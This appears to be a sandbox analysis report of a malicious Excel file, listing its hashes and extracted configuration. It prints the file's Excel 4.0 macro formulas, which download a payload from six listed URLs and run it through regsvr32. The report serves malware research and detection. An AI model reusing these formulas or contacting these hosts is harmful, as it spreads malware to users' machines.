General
-
Target
c064c6f713396100b8c0c6673a7c35621f64bc36e57c265a4faf709ea9cef09a
-
Size
45KB
-
MD5
2b0a75d90058510b72b6bcd80e402a94
-
SHA1
1eca873ec159517f69d491b80e0e06193d2a06e3
-
SHA256
c064c6f713396100b8c0c6673a7c35621f64bc36e57c265a4faf709ea9cef09a
-
SHA512
8fd4d895fde5fdfd56ed7e4217a61c2e20e66a2c94f27af9100cae10195e92c418d5d3a3afe14e9e0676c0a2b905bdafdf001e6ab1834f88b8c296a1b6d890d0
-
SSDEEP
768:pC1JP/r66l6UqffqSYHgckhNhsJ8j5aaDIS29mCg58932m5K74Y:k11/gnZYAckhNv9aacLC4Gm5K74Y
Malware Config
Extracted
http://henrysfreshroast.com/OevI7Yy0i6YShxFl/
http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/
http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/
https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/
http://1000paginas.com/tienda/vWtT/
http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx") =RETURN()
Signatures
Files
-
c064c6f713396100b8c0c6673a7c35621f64bc36e57c265a4faf709ea9cef09a